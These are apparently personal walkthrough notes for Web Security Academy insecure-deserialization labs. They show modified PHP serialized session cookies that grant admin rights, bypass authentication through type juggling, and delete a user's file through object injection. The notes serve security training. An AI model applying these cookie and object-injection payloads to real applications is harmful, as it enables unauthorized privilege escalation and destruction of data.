labs
Lab - 1: Modifying serialized objects (A)
This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete Carlos's account. You can log in to your own account using the following credentials: wiener:peter
enter with the user
wiener
and at my-account page
GET /my-account HTTP/1.1
Host: 0af2008803bc0d5cc0878b8500100022.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d
...
we are interested in the
Cookie: session
and if select that value ('Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d') in Burp (after decoding from URL and base64), the following result will be seen.
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
send it to Repeater and change the
b:0
tob:1
then send request to
/admin
and found an admin interface
GET /admin/delete?username=carlos HTTP/1.1
Host: 0af2008803bc0d5cc0878b8500100022.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30%3d
...
Lab - 2: Modifying serialized data types (P)
This lab uses a serialization-based session mechanism and is vulnerable to authentication bypass as a result. To solve the lab, edit the serialized object in the session cookie to access the administrator account. Then, delete Carlos. You can log in to your own account using the following credentials: wiener:peter
login with wiener
session cookie is as follow:
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJkY3FvNWVqcHo2dHR3aWEzcDlka3AwbGR5bm13YjhpdyI7fQ%3d%3d
after encoding
O:4:"User":2:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"dcqo5ejpz6ttwia3p9dkp0ldynmwb8iw";}
if try to access
/admin
panel -> 401 responsechange the session cookie as follow:
O:4:"User":2:{s:8:"username";s:13:"administrator";s:12:"access_token";i:0;}
the encoded version as follow
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9
now we can access as administrator
Lab - 3: Using application functionality to exploit insecure deserialization (P)
This lab uses a serialization-based session mechanism. A certain feature invokes a dangerous method on data provided in a serialized object. To solve the lab, edit the serialized object in the session cookie and use it to delete the morale.txt file from Carlos's home directory. You can log in to your own account using the following credentials: wiener:peter ;You also have access to a backup account: gregg:rosebud
login with
wiener
account and Delete the accountgrep the POST request of delete
POST /my-account/delete HTTP/1.1
Host: 0a81005a0389f349c00ec163003900e5.web-security-academy.net
Cookie: session=Tzo0OiJVc2VyIjozOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czoxMjoiYWNjZXNzX3Rva2VuIjtzOjMyOiJ3NTFpdjI4YmZlcnFqb3hqNmw5d2tjMzZ5em13dXNuYyI7czoxMToiYXZhdGFyX2xpbmsiO3M6MTk6InVzZXJzL3dpZW5lci9hdmF0YXIiO30%3d
after decoding the session cookie:
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"w51iv28bferqjoxj6l9wkc36yzmwusnc";s:11:"avatar_link";s:19:"users/wiener/avatar";}
changing the cookie into
O:4:"User":3:{s:8:"username";s:6:"wiener";s:12:"access_token";s:32:"w51iv28bferqjoxj6l9wkc36yzmwusnc";s:11:"avatar_link";s:23:"/home/carlos/morale.txt";}
then decode and send this request
Lab - 4: Arbitrary object injection in PHP (P)
This lab uses a serialization-based session mechanism and is vulnerable to arbitrary object injection as a result. To solve the lab, create and inject a malicious serialized object to delete the morale.txt file from Carlos's home directory. You will need to obtain source code access to solve this lab. You can log in to your own account using the following credentials: wiener:peter
login with
wiener
in Burp sitemap, there is a file at
/libs/CustomTemplate.php
GET request to this file appending
~
to read the source code, like this
GET /libs/CustomTemplate.php~ HTTP/1.1
Host: 0a9f00900498ae1cc14c3e3a00b40062.web-security-academy.net
in response, find a magic function
__destruct()
<?php
class CustomTemplate {
...
function __destruct() {
// Carlos thought this would be a good idea
if (file_exists($this->lock_file_path)) {
unlink($this->lock_file_path);
}
}
}
?>
send a request containing the session cookie to Burp Repeater
replace the session cookie with the following
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:23:"/home/carlos/morale.txt";}
Lab - 5: Exploiting Java deserialization with Apache Commons (P)
This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don't have source code access, you can still exploit this lab using pre-built gadget chains. To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos's home directory. You can log in to your own account using the following credentials: wiener:peter
Last updated